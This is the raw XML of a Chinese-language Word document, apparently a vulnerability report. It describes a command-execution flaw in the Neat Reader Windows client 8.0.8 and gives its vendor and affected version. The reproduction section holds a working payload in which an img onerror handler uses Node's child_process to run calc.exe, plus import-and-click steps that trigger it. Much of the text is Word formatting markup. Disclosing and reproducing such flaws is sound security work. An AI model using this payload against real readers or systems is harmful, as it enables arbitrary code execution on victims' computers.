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3" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="32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24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Neat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="32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24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Reader存在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>命令执行</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:color w:val="333333"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>漏洞</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="10"/>
        <w:keepNext/>
        <w:keepLines/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="260" w:after="260" w:line="413" w:lineRule="auto"/>
        <w:ind w:firstLineChars="0"/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漏洞描述</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="260" w:after="260" w:line="413" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default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</w:rPr>
        <w:t>北京高知图新教育科技有限公司</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>，成立于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2016</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>年，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</w:rPr>
        <w:t xml:space="preserve">Neat Reader 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是该公司旗下的产品。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</w:rPr>
        <w:t>致力于打造一个满足现代需求的 EPUB/TXT 阅读器，Neat Reader 拥有强大的解析引擎，支持 ePub 和 Txt，无论是任何类型的图书，都能完美展现，提供最佳阅读效果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</w:rPr>
        <w:t>Neat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</w:rPr>
        <w:t>Reader</w:t>
      </w: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存在命令执行漏洞，攻击者可以使用此漏洞进行恶意命令执行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="260" w:after="260" w:line="413" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:sz w:val="32"/>
        </w:rPr>
        <w:t>二、漏洞影响</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="260" w:after="260" w:line="413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Windows客户端8.0.8</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="260" w:after="260" w:line="413" w:lineRule="auto"/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三、漏洞复现</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="260" w:after="260" w:line="413" w:lineRule="auto"/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创建一个文本文档，填入以下payload：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:keepLines/>
        <w:spacing w:before="260" w:after="260" w:line="413" w:lineRule="auto"/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&lt;img/src="1"/onerror=eval(`require("child_process").exec("calc.exe");`);&gt;"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="883285"/>
            <wp:effectExtent l="0" t="0" r="5080" b="254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打开 Neat Reader，点击添加图书，选择包含payload的文本文档导入。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="3014980"/>
            <wp:effectExtent l="0" t="0" r="8890" b="444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导入后如下图所示</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default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</w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4505325" cy="4234180"/>
            <wp:effectExtent l="0" t="0" r="0" b="444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  <w:t>点击新添加的文本文档，触发payload成功。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pP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default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Arial"/>
          <w:color w:val="333333"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24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62245" cy="2783205"/>
            <wp:effectExtent l="0" t="0" r="5080" b="762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04FC0"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="07904F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FB"/>
    <w:rsid w:val="00062EF4"/>
    <w:rsid w:val="000E2B67"/>
    <w:rsid w:val="00123296"/>
    <w:rsid w:val="0017451D"/>
    <w:rsid w:val="00436BCA"/>
    <w:rsid w:val="004759C0"/>
    <w:rsid w:val="00510856"/>
    <w:rsid w:val="00604F96"/>
    <w:rsid w:val="006821BB"/>
    <w:rsid w:val="006F7028"/>
    <w:rsid w:val="0075295B"/>
    <w:rsid w:val="008A0611"/>
    <w:rsid w:val="008A28BA"/>
    <w:rsid w:val="008A7AFB"/>
    <w:rsid w:val="00936D48"/>
    <w:rsid w:val="00987775"/>
    <w:rsid w:val="00A85570"/>
    <w:rsid w:val="00AF2F69"/>
    <w:rsid w:val="00D014A9"/>
    <w:rsid w:val="00D172C4"/>
    <w:rsid w:val="00DD6588"/>
    <w:rsid w:val="00E069D5"/>
    <w:rsid w:val="00E07851"/>
    <w:rsid w:val="00E55EF3"/>
    <w:rsid w:val="00F470BF"/>
    <w:rsid w:val="2DBD0A38"/>
    <w:rsid w:val="48E25F59"/>
    <w:rsid w:val="5A8E602A"/>
    <w:rsid w:val="66D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374</Words>
  <Characters>2134</Characters>
  <Lines>17</Lines>
  <Paragraphs>5</Paragraphs>
  <TotalTime>8</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>2503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2021-05-06T14:13:00Z</dcterms:created>
  <dc:creator>asus</dc:creator>
  <cp:lastModifiedBy>正轨</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2022-02-25T15:20:24Z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DBC3E7AACED54C9FBBD01B506FF89D08</vt:lpwstr>
  </property>
</Properties>
</file>